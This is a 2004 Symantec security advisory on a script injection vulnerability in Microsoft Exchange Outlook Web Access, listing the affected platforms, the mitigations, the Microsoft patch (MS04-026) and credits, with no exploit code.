WelcomeEnterpriseSmall BusinessHome & Home OfficePartnersAbout Symantec

Microsoft Exchange Outlook Web Access Script Injection Vulnerability

Risk
Medium

Date Discovered
08-10-2004

Description
Microsoft Exchange Outlook Web Access (OWA) is prone to a vulnerability that may permit remote attackers to inject hostile script code into client sessions.

The vulnerability will allow hostile script to access properties of the OWA server and Web pages hosted on the site.

It is noted that the attacker must authenticate to OWA to be in a position to exploit this issue. If successfully exploited, this could allow for various attacks, such as session hijacking, and content spoofing. This issue could also be used to exploit latent vulnerabilities in Web client software.

Platforms Affected
Microsoft BackOffice 4.5
Microsoft Windows 2000 Professional
Microsoft Windows 2000 Professional SP1
Microsoft Windows 2000 Professional SP2
Microsoft Windows NT 4.0
Microsoft Windows NT 4.0 SP1
Microsoft Windows NT 4.0 SP2
Microsoft Windows NT 4.0 SP3
Microsoft Windows NT 4.0 SP4
Microsoft Windows NT 4.0 SP5
Microsoft Windows NT 4.0 SP6
Microsoft Windows NT 4.0 SP6a

Components Affected
Microsoft Exchange Server 5.5 SP4

Recommendations
Block external access at the network boundary, unless service is required by external parties.
Use network access controls to explicitly restrict external access by untrusted networks and hosts. Permit access for trusted networks and hosts only.

Disallow anonymous access to services. Permit access for trusted individuals only.
Only permit anonymous access to the service if it is an explicit requirement. This will reduce exposure to exploitation of this and other latent vulnerabilities.

Run all client software as a non-privileged user with minimal access rights.
As a general security precaution against Web browser attacks, users should perform non-administrative tasks as an unprivileged user with minimal access rights.

Set web browser security to disable the execution of script code or active content.
Disabling support for client-side scripting and Active Content may limit exposure to consequences of this and other latent vulnerabilities.

Communicate sensitive information over encrypted channels.
Access to Outlook Web Access should occur over SSL-protected communication channels. This may limit the consequences of this issue.

Disable any services that are not needed.
If the Outlook Web Access service is not explicitly required, it should be disabled or removed on all Exchange servers where it is present.

Microsoft has released a Security Bulletin that includes fixes to address this issue.


Microsoft Exchange Server 5.5 SP4:

Microsoft Patch Security Update for Exchange 5.5 (KB842436)
http://www.microsoft.com/downloads/details.aspx?FamilyId=66E4E033-5A4C-4EEC-84F1-31F0CA878092&displaylang=en

References
Source: Microsoft Security Bulletin MS04-026
URL: http://www.microsoft.com/technet/security/bulletin/ms04-026.mspx

Credits
Discovery is credited to Amit Klein.


Copyright (c) 2004 by Symantec Corp.
Permission to redistribute this alert electronically is granted as long as it is not edited in any way unless authorized by Symantec Security Response. Reprinting the whole or part of this alert in any medium other than electronically requires permission from symsecurity@symantec.com.

Disclaimer
The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information.

Symantec, Symantec products, Symantec Security Response, and SymSecurity are registered trademarks of Symantec Corp. and/or affiliated companies in the United States and other countries. All other registered and unregistered trademarks represented in this document are the sole property of their respective companies/owners.